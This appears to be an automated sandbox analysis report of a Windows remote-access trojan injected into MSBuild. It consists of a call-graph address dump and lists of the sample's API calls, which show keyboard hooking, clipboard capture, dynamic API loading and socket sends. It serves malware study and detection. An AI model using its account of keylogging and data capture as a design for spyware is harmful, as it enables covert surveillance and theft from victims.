47168->47169 47172 401e13 26 API calls 47169->47172 47173 401e13 26 API calls 47170->47173 47174 401e13 26 API calls 47171->47174 47175 40ca6b 47172->47175 47173->47141 47174->47141 47176 401e13 26 API calls 47175->47176 47177 40ca74 47176->47177 47178 401e13 26 API calls 47177->47178 47179 40ca7d 47178->47179 47179->46658 47180->46670 47181->46692 47183 412683 RegQueryValueExA RegCloseKey 47182->47183 47184 4126a7 47182->47184 47183->47184 47184->46651 47185->46684 47186->46720 47187->46730 47188->46754 47189->46742 47190->46775 47192 401e0c 47191->47192 47193->46603 47196 40e183 47195->47196 47197 41a65c LoadResource LockResource SizeofResource 47195->47197 47196->46832 47197->47196 47199 401f86 28 API calls 47198->47199 47200 406066 47199->47200 47200->46843 47206 403c30 47201->47206 47204->46864 47205->46845 47207 403c39 47206->47207 47210 403c59 47207->47210 47211 403c68 47210->47211 47216 4032a4 47211->47216 47213 403c74 47214 402325 28 API calls 47213->47214 47215 403b73 47214->47215 47215->46864 47217 4032b0 47216->47217 47218 4032ad 47216->47218 47221 4032b6 28 API calls 47217->47221 47218->47213 47222->46868 47224 404bd0 47223->47224 47225 40245c 28 API calls 47224->47225 47226 404be4 47225->47226 47226->46871 47227->46875 47229 401e94 47228->47229 47231 41a471 47230->47231 47232 41b168 GetCurrentProcess 47230->47232 47233 412513 RegOpenKeyExA 47231->47233 47232->47231 47234 412541 RegQueryValueExA RegCloseKey 47233->47234 47235 412569 47233->47235 47234->47235 47236 401f66 28 API calls 47235->47236 47237 41257e 47236->47237 47237->46888 47238->46896 47240 40b02f 47239->47240 47243 40b04b 47240->47243 47242 40b045 47242->46907 47244 40b055 47243->47244 47246 40b060 47244->47246 47247 40b138 28 API calls 47244->47247 47246->47242 47247->47246 47248->46910 47249->46913 47251 40230d 47250->47251 47252 402325 28 API calls 47251->47252 47253 401f80 47252->47253 47253->46663 47272 43a545 47254->47272 47256 43998b 47281 4392de 38 API calls 2 library calls 47256->47281 47258 439950 47258->47256 47259 439965 47258->47259 47271 40dd54 47258->47271 47279 445354 20 API calls _abort 47259->47279 47261 43996a 47280 43a827 26 API calls _Deallocate 47261->47280 47264 439997 47265 4399c6 47264->47265 47282 43a58a 42 API calls __Toupper 47264->47282 47266 439a32 47265->47266 47283 43a4f1 26 API calls 2 library calls 47265->47283 47284 43a4f1 26 API calls 2 library calls 47266->47284 47269 439af9 _strftime 47269->47271 47285 445354 20 API calls _abort 47269->47285 47271->46678 47271->46680 47273 43a54a 47272->47273 47274 43a55d 47272->47274 47286 445354 20 API calls _abort 47273->47286 47274->47258 47276 43a54f 47287 43a827 26 API calls _Deallocate 47276->47287 47278 43a55a 47278->47258 47279->47261 47280->47271 47281->47264 47282->47264 47283->47266 47284->47269 47285->47271 47286->47276 47287->47278 47288->46956 47290 409855 47289->47290 47291 4124b7 3 API calls 47290->47291 47292 40985c 47291->47292 47293 409870 47292->47293 47294 40988a 47292->47294 47295 4095cf 47293->47295 47296 409875 47293->47296 47308 4082dc 47294->47308 47295->46715 47298 4082dc 28 API calls 47296->47298 47300 409883 47298->47300 47334 409959 29 API calls 47300->47334 47303 409888 47303->47295 47304->46981 47464 402d8b 47305->47464 47307 4028dd 47307->46984 47309 4082eb 47308->47309 47335 408431 47309->47335 47311 408309 47312 4098a5 47311->47312 47340 40affa 47312->47340 47315 4098f6 47318 401f66 28 API calls 47315->47318 47316 4098ce 47317 401f66 28 API calls 47316->47317 47319 4098d8 47317->47319 47320 409901 47318->47320 47321 41ae08 28 API calls 47319->47321 47322 401f66 28 API calls 47320->47322 47323 4098e6 47321->47323 47324 409910 47322->47324 47344 40a876 31 API calls ___crtLCMapStringA 47323->47344 47326 41a686 79 API calls 47324->47326 47327 409915 CreateThread 47326->47327 47329 409930 CreateThread 47327->47329 47330 40993c CreateThread 47327->47330 47350 4099a9 47327->47350 47328 4098ed 47331 401eea 26 API calls 47328->47331 47329->47330 47356 409993 47329->47356 47332 401e13 26 API calls 47330->47332 47353 4099b5 47330->47353 47331->47315 47333 409950 47332->47333 47333->47295 47334->47303 47463 40999f 134 API calls 47334->47463 47336 40843d 47335->47336 47338 40845b 47336->47338 47339 402f0d 28 API calls 47336->47339 47338->47311 47339->47338 47342 40b006 47340->47342 47341 4098c3 47341->47315 47341->47316 47342->47341 47345 403b9e 47342->47345 47344->47328 47346 403ba8 47345->47346 47348 403bb3 47346->47348 47349 403cfd 28 API calls 47346->47349 47348->47341 47349->47348 47359 409e48 47350->47359 47392 40a3f4 47353->47392 47441 4099e4 47356->47441 47360 409e5d Sleep 47359->47360 47379 409d97 47360->47379 47362 4099b2 47363 409eae GetFileAttributesW 47367 409e6f 47363->47367 47364 409e9d CreateDirectoryW 47364->47367 47365 409ec5 SetFileAttributesW 47365->47367 47366 41b58f 4 API calls 47366->47367 47367->47360 47367->47362 47367->47363 47367->47364 47367->47365 47367->47366 47369 401d64 28 API calls 47367->47369 47377 409f10 47367->47377 47368 409f3f PathFileExistsW 47368->47377 47369->47367 47370 41b61a 32 API calls 47370->47377 47371 401f86 28 API calls 47371->47377 47372 40a048 SetFileAttributesW 47372->47367 47373 406052 28 API calls 47373->47377 47374 401eef 26 API calls 47374->47377 47375 401eea 26 API calls 47375->47377 47376 41b687 4 API calls 47376->47377 47377->47368 47377->47370 47377->47371 47377->47372 47377->47373 47377->47374 47377->47375 47377->47376 47378 401eea 26 API calls 47377->47378 47378->47367 47380 409e44 47379->47380 47382 409dad 47379->47382 47380->47367 47381 409dcc CreateFileW 47381->47382 47383 409dda GetFileSize 47381->47383 47382->47381 47384 409e0f CloseHandle 47382->47384 47385 409e21 47382->47385 47386 409e04 Sleep 47382->47386 47391 40a7f0 83 API calls 47382->47391 47383->47382 47383->47384 47384->47382 47385->47380 47388 4082dc 28 API calls 47385->47388 47386->47384 47389 409e3d 47388->47389 47390 4098a5 125 API calls 47389->47390 47390->47380 47391->47386 47398 40a402 47392->47398 47393 4099be 47394 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47396 40b027 28 API calls 47394->47396 47396->47398 47398->47393 47398->47394 47400 41aca0 GetTickCount 47398->47400 47401 40a4a2 GetWindowTextW 47398->47401 47403 401e13 26 API calls 47398->47403 47404 40a5ff 47398->47404 47405 40affa 28 API calls 47398->47405 47407 40a569 Sleep 47398->47407 47410 401f66 28 API calls 47398->47410 47411 40a4f1 47398->47411 47416 4028cf 28 API calls 47398->47416 47417 405ce6 28 API calls 47398->47417 47418 41ae08 28 API calls 47398->47418 47419 409d58 27 API calls 47398->47419 47420 401eea 26 API calls 47398->47420 47421 433519 5 API calls __Init_thread_wait 47398->47421 47422 4338a5 29 API calls __onexit 47398->47422 47423 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47398->47423 47424 4082a8 28 API calls 47398->47424 47426 40b0dd 28 API calls 47398->47426 47427 40ae58 44 API calls 2 library calls 47398->47427 47428 440c51 47398->47428 47432 404c9e 28 API calls 47398->47432 47400->47398 47401->47398 47403->47398 47406 401e13 26 API calls 47404->47406 47405->47398 47406->47393 47407->47398 47410->47398 47411->47398 47412 4082dc 28 API calls 47411->47412 47425 40a876 31 API calls ___crtLCMapStringA 47411->47425 47412->47411 47416->47398 47417->47398 47418->47398 47419->47398 47420->47398 47421->47398 47422->47398 47423->47398 47424->47398 47425->47411 47426->47398 47427->47398 47429 440c5d 47428->47429 47433 440a4d 47429->47433 47432->47398 47434 440a64 47433->47434 47438 440aa5 47434->47438 47439 445354 20 API calls _abort 47434->47439 47436 440a9b 47440 43a827 26 API calls _Deallocate 47436->47440 47438->47398 47439->47436 47440->47438 47442 409a63 GetMessageA 47441->47442 47443 4099ff SetWindowsHookExA 47441->47443 47444 409a75 TranslateMessage DispatchMessageA 47442->47444 47456 40999c 47442->47456 47443->47442 47446 409a1b GetLastError 47443->47446 47444->47442 47444->47456 47457 41ad46 47446->47457 47450 409a3e 47451 401f66 28 API calls 47450->47451 47452 409a4d 47451->47452 47453 41a686 79 API calls 47452->47453 47454 409a52 47453->47454 47455 401eea 26 API calls 47454->47455 47455->47456 47458 440c51 26 API calls 47457->47458 47459 41ad67 47458->47459 47460 401f66 28 API calls 47459->47460 47461 409a31 47460->47461 47462 404c9e 28 API calls 47461->47462 47462->47450 47465 402d97 47464->47465 47468 4030f7 47465->47468 47467 402dab 47467->47307 47469 403101 47468->47469 47471 403115 47469->47471 47472 4036c2 28 API calls 47469->47472 47471->47467 47472->47471 47474 403b48 47473->47474 47480 403b7a 47474->47480 47477 403cbb 47484 403dc2 47477->47484 47479 403cc9 47479->46993 47481 403b86 47480->47481 47482 403b9e 28 API calls 47481->47482 47483 403b5a 47482->47483 47483->47477 47485 403dce 47484->47485 47488 402ffd 47485->47488 47487 403de3 47487->47479 47489 40300e 47488->47489 47490 4032a4 28 API calls 47489->47490 47491 40301a 47490->47491 47493 40302e 47491->47493 47494 4035e8 28 API calls 47491->47494 47493->47487 47494->47493 47501 4395ba 47495->47501 47499 412814 47498->47499 47500 4127ed RegSetValueExA RegCloseKey 47498->47500 47499->47019 47500->47499 47504 43953b 47501->47504 47503 401608 47503->47017 47505 43954a 47504->47505 47506 43955e 47504->47506 47512 445354 20 API calls _abort 47505->47512 47511 43955a __alldvrm 47506->47511 47514 447601 11 API calls 2 library calls 47506->47514 47508 43954f 47513 43a827 26 API calls _Deallocate 47508->47513 47511->47503 47512->47508 47513->47511 47514->47511 47518 41aab9 ctype ___scrt_fastfail 47515->47518 47516 401f66 28 API calls 47517 41ab2e 47516->47517 47517->47023 47518->47516 47519->47039 47521 413fb3 getaddrinfo WSASetLastError 47520->47521 47522 413fa9 47520->47522 47521->47103 47654 413e37 35 API calls ___std_exception_copy 47522->47654 47524 413fae 47524->47521 47526 404206 socket 47525->47526 47527 4041fd 47525->47527 47529 404220 47526->47529 47530 404224 CreateEventW 47526->47530 47655 404262 WSAStartup 47527->47655 47529->47103 47530->47103 47531 404202 47531->47526 47531->47529 47533 4049b1 47532->47533 47534 40492a 47532->47534 47533->47103 47535 404933 47534->47535 47536 404987 CreateEventA CreateThread 47534->47536 47537 404942 GetLocalTime 47534->47537 47535->47536 47536->47533 47657 404b1d 47536->47657 47538 41ad46 28 API calls 47537->47538 47539 40495b 47538->47539 47656 404c9e 28 API calls 47539->47656 47541 404968 47542 401f66 28 API calls 47541->47542 47543 404977 47542->47543 47544 41a686 79 API calls 47543->47544 47545 40497c 47544->47545 47546 401eea 26 API calls 47545->47546 47546->47536 47548 4043e1 47547->47548 47549 4042b3 47547->47549 47550 4043e7 WSAGetLastError 47548->47550 47602 404343 47548->47602 47551 4042e8 47549->47551 47553 404cbf 28 API calls 47549->47553 47549->47602 47552 4043f7 47550->47552 47550->47602 47661 420151 27 API calls 47551->47661 47554 4042f7 47552->47554 47555 4043fc 47552->47555 47558 4042d4 47553->47558 47561 401f66 28 API calls 47554->47561 47666 41bc76 30 API calls 47555->47666 47557 4042f0 47557->47554 47560 404306 47557->47560 47562 401f66 28 API calls 47558->47562 47570 404315 47560->47570 47571 40434c 47560->47571 47564 404448 47561->47564 47565 4042e3 47562->47565 47563 40440b 47667 404c9e 28 API calls 47563->47667 47567 401f66 28 API calls 47564->47567 47568 41a686 79 API calls 47565->47568 47572 404457 47567->47572 47568->47551 47569 404418 47573 401f66 28 API calls 47569->47573 47576 401f66 28 API calls 47570->47576 47663 420f34 56 API calls 47571->47663 47577 41a686 79 API calls 47572->47577 47575 404427 47573->47575 47579 41a686 79 API calls 47575->47579 47580 404324 47576->47580 47577->47602 47578 404354 47581 404389 47578->47581 47582 404359 47578->47582 47583 40442c 47579->47583 47584 401f66 28 API calls 47580->47584 47665 4202ea 28 API calls 47581->47665 47585 401f66 28 API calls 47582->47585 47586 401eea 26 API calls 47583->47586 47587 404333 47584->47587 47589 404368 47585->47589 47586->47602 47590 41a686 79 API calls 47587->47590 47592 401f66 28 API calls 47589->47592 47593 404338 47590->47593 47591 404391 47594 4043be CreateEventW CreateEventW 47591->47594 47596 401f66 28 API calls 47591->47596 47595 404377 47592->47595 47662 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47593->47662 47594->47602 47598 41a686 79 API calls 47595->47598 47597 4043a7 47596->47597 47600 401f66 28 API calls 47597->47600 47601 40437c 47598->47601 47603 4043b6 47600->47603 47664 420592 54 API calls 47601->47664 47602->47103 47605 41a686 79 API calls 47603->47605 47606 4043bb 47605->47606 47606->47594 47668 41a945 GlobalMemoryStatusEx 47607->47668 47609 41a982 47609->47103 47669 413646 47610->47669 47614 40cc0d 47613->47614 47615 41246e 3 API calls 47614->47615 47617 40cc14 47615->47617 47616 40cc2c 47616->47103 47617->47616 47618 4124b7 3 API calls 47617->47618 47618->47616 47620 401f86 28 API calls 47619->47620 47621 41ae03 47620->47621 47621->47103 47623 41acb6 GetTickCount 47622->47623 47623->47103 47625 436050 ___scrt_fastfail 47624->47625 47626 41ac71 GetForegroundWindow GetWindowTextW 47625->47626 47627 403b40 28 API calls 47626->47627 47628 41ac9b 47627->47628 47628->47103 47630 401f66 28 API calls 47629->47630 47631 40e69e 47630->47631 47631->47103 47632->47103 47636 4045ec 47633->47636 47634 43a88c ___crtLCMapStringA 21 API calls 47634->47636 47636->47634 47637 40465b 47636->47637 47638 401f86 28 API calls 47636->47638 47640 401eef 26 API calls 47636->47640 47643 401eea 26 API calls 47636->47643 47710 404688 47636->47710 47721 40455b 59 API calls 47636->47721 47637->47636 47639 404666 47637->47639 47638->47636 47722 4047eb 98 API calls 47639->47722 47640->47636 47642 40466d 47644 401eea 26 API calls 47642->47644 47643->47636 47645 404676 47644->47645 47646 401eea 26 API calls 47645->47646 47647 40467f 47646->47647 47647->47103 47649->47103 47650->47067 47651->47067 47652->47067 47653->47067 47654->47524 47655->47531 47656->47541 47660 404b29 101 API calls 47657->47660 47659 404b26 47660->47659 47661->47557 47662->47602 47663->47578 47664->47593 47665->47591 47666->47563 47667->47569 47668->47609 47672 413619 47669->47672 47673 41362e ___scrt_initialize_default_local_stdio_options 47672->47673 47676 43e2dd 47673->47676 47679 43b030 47676->47679 47680 43b070 47679->47680 47681 43b058 47679->47681 47680->47681 47682 43b078 47680->47682 47703 445354 20 API calls _abort 47681->47703 47705 4392de 38 API calls 2 library calls 47682->47705 47685 43b05d 47704 43a827 26 API calls _Deallocate 47685->47704 47687 43b088 47706 43b7b6 20 API calls 2 library calls 47687->47706 47688 43b068 47696 433d2c 47688->47696 47691 41363c 47691->47103 47692 43b100 47707 43be24 50 API calls 3 library calls 47692->47707 47695 43b10b 47708 43b820 20 API calls _free 47695->47708 47697 433d37 IsProcessorFeaturePresent 47696->47697 47698 433d35 47696->47698 47700 4341a4 47697->47700 47698->47691 47709 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47700->47709 47702 434287 47702->47691 47703->47685 47704->47688 47705->47687 47706->47692 47707->47695 47708->47688 47709->47702 47714 4046a3 47710->47714 47711 4047d8 47712 401eea 26 API calls 47711->47712 47713 4047e1 47712->47713 47713->47637 47714->47711 47715 403b60 28 API calls 47714->47715 47716 401eef 26 API calls 47714->47716 47717 401eea 26 API calls 47714->47717 47718 401fbd 28 API calls 47714->47718 47719 401ebd 28 API calls 47714->47719 47715->47714 47716->47714 47717->47714 47718->47714 47720 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 47719->47720 47720->47714 47723 414b9b 47720->47723 47721->47636 47722->47642 47724 401fbd 28 API calls 47723->47724 47725 414bbd SetEvent 47724->47725 47726 414bd2 47725->47726 47727 403b60 28 API calls 47726->47727 47728 414bec 47727->47728 47729 401fbd 28 API calls 47728->47729 47730 414bfc 47729->47730 47731 401fbd 28 API calls 47730->47731 47732 414c0e 47731->47732 47733 41afc3 28 API calls 47732->47733 47734 414c17 47733->47734 47735 414d8a 47734->47735 47737 414c37 GetTickCount 47734->47737 47797 414d99 47734->47797 47736 401d8c 26 API calls 47735->47736 47738 4161fb 47736->47738 47739 41ad46 28 API calls 47737->47739 47741 401eea 26 API calls 47738->47741 47742 414c4d 47739->47742 47740 414dad 47811 404ab1 83 API calls 47740->47811 47744 416207 47741->47744 47745 41aca0 GetTickCount 47742->47745 47747 401eea 26 API calls 47744->47747 47748 414c54 47745->47748 47746 414d7d 47746->47735 47749 416213 47747->47749 47750 41ad46 28 API calls 47748->47750 47751 414c5f 47750->47751 47752 41ac52 30 API calls 47751->47752 47753 414c6d 47752->47753 47802 41aec8 47753->47802 47756 401d64 28 API calls 47757 414c89 47756->47757 47806 4027ec 28 API calls 47757->47806 47759 414c97 47807 40275c 28 API calls 47759->47807 47761 414ca6 47762 4027cb 28 API calls 47761->47762 47763 414cb5 47762->47763 47808 40275c 28 API calls 47763->47808 47765 414cc4 47766 4027cb 28 API calls 47765->47766 47767 414cd0 47766->47767 47809 40275c 28 API calls 47767->47809 47769 414cda 47770 404468 60 API calls 47769->47770 47771 414ce9 47770->47771 47772 401eea 26 API calls 47771->47772 47773 414cf2 47772->47773 47774 401eea 26 API calls 47773->47774 47775 414cfe 47774->47775 47776 401eea 26 API calls 47775->47776 47777 414d0a 47776->47777 47778 401eea 26 API calls 47777->47778 47779 414d16 47778->47779 47780 401eea 26 API calls 47779->47780 47781 414d22 47780->47781 47782 401eea 26 API calls 47781->47782 47783 414d2e 47782->47783 47784 401e13 26 API calls 47783->47784 47785 414d3a 47784->47785 47786 401eea 26 API calls 47785->47786 47787 414d43 47786->47787 47788 401eea 26 API calls 47787->47788 47789 414d4c 47788->47789 47790 401d64 28 API calls 47789->47790 47791 414d57 47790->47791 47792 43a5e7 _strftime 42 API calls 47791->47792 47793 414d64 47792->47793 47794 414d69 47793->47794 47795 414d8f 47793->47795 47798 414d82 47794->47798 47799 414d77 47794->47799 47796 401d64 28 API calls 47795->47796 47796->47797 47797->47735 47797->47740 47800 404915 104 API calls 47798->47800 47810 4049ba 81 API calls 47799->47810 47800->47735 47803 41aed5 47802->47803 47804 401f86 28 API calls 47803->47804 47805 414c7b 47804->47805 47805->47756 47806->47759 47807->47761 47808->47765 47809->47769 47810->47746 47811->47746 47813->47133 47814->47159 47815->47158 47816->47147 47817->47151 47818->47157 47821 40e56a 47819->47821 47820 4124b7 3 API calls 47820->47821 47821->47820 47823 40e60e 47821->47823 47825 40e5fe Sleep 47821->47825 47842 40e59c 47821->47842 47822 4082dc 28 API calls 47822->47842 47824 4082dc 28 API calls 47823->47824 47827 40e619 47824->47827 47825->47821 47826 41ae08 28 API calls 47826->47842 47829 41ae08 28 API calls 47827->47829 47830 40e625 47829->47830 47854 412774 29 API calls 47830->47854 47833 401e13 26 API calls 47833->47842 47834 40e638 47835 401e13 26 API calls 47834->47835 47837 40e644 47835->47837 47836 401f66 28 API calls 47836->47842 47838 401f66 28 API calls 47837->47838 47839 40e655 47838->47839 47841 4126d2 29 API calls 47839->47841 47840 4126d2 29 API calls 47840->47842 47843 40e668 47841->47843 47842->47822 47842->47825 47842->47826 47842->47833 47842->47836 47842->47840 47852 40bf04 73 API calls ___scrt_fastfail 47842->47852 47853 412774 29 API calls 47842->47853 47855 411699 TerminateProcess WaitForSingleObject 47843->47855 47845 40e670 ExitProcess 47856 411637 61 API calls 47848->47856 47853->47842 47854->47834 47855->47845

                                                                                                                        Executed Functions

                                                                                                                        Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                                        • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                        • API String ID: 384173800-625181639
                                                                                                                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                        • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                        • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                                                        Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32 ref: 004159C7
                                                                                                                        • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                        • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                        • OpenClipboard.USER32 ref: 00415A61
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                        • CloseClipboard.USER32 ref: 00415A89
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3520204547-0
                                                                                                                        • Opcode ID: 3a7e4f33a3e022d1b01f4a7aa625db061848c5be4a14c20c955616a9f3133e94
                                                                                                                        • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                                        • Opcode Fuzzy Hash: 3a7e4f33a3e022d1b01f4a7aa625db061848c5be4a14c20c955616a9f3133e94
                                                                                                                        • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                        Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1291 4099e4-4099fd 1292 409a63-409a73 GetMessageA 1291->1292 1293 4099ff-409a19 SetWindowsHookExA 1291->1293 1294 409a75-409a8d TranslateMessage DispatchMessageA 1292->1294 1295 409a8f 1292->1295 1293->1292 1298 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1293->1298 1294->1292 1294->1295 1296 409a91-409a96 1295->1296 1298->1296
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                        • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                        • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                        • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                        • String ID: Keylogger initialization failure: error $`#v
                                                                                                                        • API String ID: 3219506041-3226811161
                                                                                                                        • Opcode ID: 0500c0fb2287cc403513c8d0c8af8369f78a70941d761820a418b2e0bcaa973e
                                                                                                                        • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                        • Opcode Fuzzy Hash: 0500c0fb2287cc403513c8d0c8af8369f78a70941d761820a418b2e0bcaa973e
                                                                                                                        • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                                        Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
